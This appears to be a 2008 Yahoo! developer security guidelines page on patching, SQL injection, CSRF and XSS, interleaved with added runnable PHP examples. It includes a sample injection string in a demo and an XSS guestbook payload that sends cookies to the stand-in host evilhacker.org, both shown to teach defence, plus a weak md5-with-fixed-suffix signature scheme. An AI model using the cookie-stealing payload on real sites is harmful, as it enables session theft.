
Yahoo! treats the security of our users' personal data very seriously, and we hope that our developers will do the same. Here are some guidelines to help you protect your users' trust in your application.
The first step in protecting user data is to ensure that your systems are kept current with security patches. If you do not operate your own dedicated servers, then please ask your hosting provider if they keep their systems up-to-date.
Be sure that the services that are exposed to the Internet are only the ones your users need to access.
Most of the cases of user data making its way into the wrong hands stem from application bugs or security holes. Here are some basic guidelines for building safe internet applications:
mysql_real_escape_string() that will prevent most attacks of this type.
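As an added example (not code from the Yahoo! page), here is the same photo lookup written with string concatenation and with a prepared statement. It uses PDO with an in-memory SQLite database so it runs without a MySQL server (the pdo_sqlite extension is assumed); the page's own recommendation, mysql_real_escape_string(), needs a live MySQL connection and is not shown. The table, rows and the $input value are all constructed for the example.

```php
<?php
// Added example, not the page's own code: a lookup written two ways, run
// against an in-memory SQLite database (assumes the pdo_sqlite extension).

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE photos (id INTEGER PRIMARY KEY, owner TEXT, title TEXT)");
// Constructed sample rows.
$db->exec("INSERT INTO photos (owner, title) VALUES ('alice', 'beach'), ('bob', 'mountain')");

// Vulnerable: the user-controlled value is pasted into the SQL text, so a quote
// character in the input changes the structure of the query itself.
function photosForOwnerUnsafe(PDO $db, string $owner): array {
    $sql = "SELECT title FROM photos WHERE owner = '" . $owner . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Safe: a prepared statement sends the value separately from the SQL text, so
// the database only ever treats it as a literal owner name, quotes included.
function photosForOwnerSafe(PDO $db, string $owner): array {
    $stmt = $db->prepare("SELECT title FROM photos WHERE owner = ?");
    $stmt->execute([$owner]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed input containing a quote character.
$input = "alice' OR '1'='1";
echo "unsafe query result:\n";
var_dump(photosForOwnerUnsafe($db, $input));
echo "prepared statement result:\n";
var_dump(photosForOwnerSafe($db, $input));
```

With the concatenated query the WHERE clause no longer restricts the result to a single owner, because the input's quote character ends the string literal early; with the prepared statement the whole input is compared as one owner name and matches nothing. Escaping, as the page suggests, closes the same hole by neutralising the quote; parameterising removes the need to get the escaping right for every call.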
Ensure that requests coming in to your application originated from your application.
Let's say you have an application that manages a user's photos. If your application provides a function to delete a user's photos (e.g. "http://myapp.org/delete_photos.php"), an attacker could embed the same URL into his web page, such as <img src="http://myapp.org/delete_photos.php">. If one of your users visited the attacker's page, your user's photos would be wiped out.
Here are some ways of ensuring that requests to your application have come from your application:
Append a user-specific signature to the end of URLs to your application.
<?php $delete_signature = md5($username . "xyz123_delete_photos"); ?>
<!-- signed link -->
<a href="/delete_photos.php?signature=<?php echo $delete_signature; ?>">Delete Photos</a>
Before taking any action on behalf of the user, check that the "signature" argument is correct by performing the same hashing operation.
<?php
// $username is the name of the currently authenticated user (for example,
// taken from the session); the fixed suffix acts as the application's secret.
$delete_signature = md5($username . "xyz123_delete_photos");
if (isset($_GET['signature']) && $_GET['signature'] === $delete_signature) {
// proceed with delete operation
// ...
} else {
// this is a problem: the signature is missing or does not match, so refuse the request
// ...
}
?>
If your development framework supports a user session container (e.g. PHP), then generate a unique signature with a timestamp and store it in the session with each request, and embed it in your forms/URLs so that it is passed back to the server with subsequent requests. Only take action on behalf of the user if the signatures match, and a certain amount of time has not passed.
<?php
$_SESSION['signature'] = md5(uniqid(rand(), true) . $username);
$_SESSION['signature_timestamp'] = time();
?>
<!-- signed link -->
<a href="/delete_photos.php?signature=<?php echo $_SESSION['signature']; ?>">Delete Photos</a>
<!-- signed form -->
<form method="POST" action="/edit_photos.php">
<input type="hidden" name="signature" value="<?php echo $_SESSION['signature']; ?>"/>
<input type="text" name="search" />
<input type="submit" />
</form>
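The session-based procedure above, carried through as one added example that is not the page's own code: it issues a random token, stores it in the session with a timestamp, embeds it in the link and form, and on the next request checks both the match and the age. The session is passed around as a plain array rather than $_SESSION so the functions can be run from the command line without session_start(); the 15-minute lifetime (TOKEN_LIFETIME_SECONDS) and the function names are assumptions for the example. It goes beyond the page's snippet in two places: random_bytes() replaces md5(uniqid()) as the token source, and hash_equals() performs the comparison.

```php
<?php
// Added example, not the page's own code: a session-bound, expiring CSRF token
// for the "delete photos" action. The session array is passed in explicitly so
// the functions can be exercised without session_start().

const TOKEN_LIFETIME_SECONDS = 900;   // assumption: 15-minute validity window

// Create a fresh random token, store it with its creation time, and return it
// for embedding in links and forms.
function issueToken(array &$session): string {
    $token = bin2hex(random_bytes(32));   // CSPRNG output, not guessable like md5(uniqid())
    $session['signature'] = $token;
    $session['signature_timestamp'] = time();
    return $token;
}

// Accept the request only if a token was submitted, it matches the stored one,
// and the stored one is still within its lifetime.
function tokenIsValid(array $session, ?string $submitted, int $now): bool {
    if ($submitted === null || !isset($session['signature'], $session['signature_timestamp'])) {
        return false;
    }
    if ($now - $session['signature_timestamp'] > TOKEN_LIFETIME_SECONDS) {
        return false;                     // expired: require a freshly rendered page
    }
    // hash_equals() compares in constant time, so the comparison leaks nothing
    // about how many leading bytes of a wrong guess were correct.
    return hash_equals($session['signature'], $submitted);
}

// Render the signed link and form. htmlspecialchars() keeps the token inside
// the attribute even if a future token format contains quote characters.
function renderSignedForm(string $token): string {
    $t = htmlspecialchars($token, ENT_QUOTES, 'UTF-8');
    return '<a href="/delete_photos.php?signature=' . $t . '">Delete Photos</a>' . "\n"
         . '<form method="POST" action="/edit_photos.php">' . "\n"
         . '<input type="hidden" name="signature" value="' . $t . '"/>' . "\n"
         . '<input type="text" name="search" />' . "\n"
         . '<input type="submit" />' . "\n"
         . '</form>';
}

// --- Simulated request cycle (constructed; no real HTTP involved) ---
$session = [];
$token = issueToken($session);
echo renderSignedForm($token), "\n";

// A request carrying the token the site itself issued in the page it served:
var_dump(tokenIsValid($session, $token, time()));
// A forged request, such as the <img> tag described above, carries no token:
var_dump(tokenIsValid($session, null, time()));
// The right token, but presented after the validity window has passed:
var_dump(tokenIsValid($session, $token, time() + TOKEN_LIFETIME_SECONDS + 1));
```

In a real handler the array would be $_SESSION, the submitted value would come from $_GET['signature'] or $_POST['signature'], and the delete would run only when tokenIsValid() returns true; issuing a new token on each page render, as the page suggests, also means a token captured from one response is useless once the user has loaded another.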
In cases where you accept input from one user and display it back to another user, you need to ensure the first user cannot steal information from the second user.
For example, if you have a guestbook application where users may enter comments for others to view, an attacker could leave a comment like the following:
Hello Everyone!<script>document.write('<img src="http://evilhacker.org/?' + document.cookie + '">');</script>
This example will send a user's cookies for your site to the server waiting at evilhacker.org. To protect against this kind of attack, check all user input against strictly defined rules about what characters are allowed. Use whitelists ("only allow these characters") to filter user input. In most cases, the < and > characters do not need to be accepted.
Copyright © 2008 Yahoo! Inc. All rights reserved.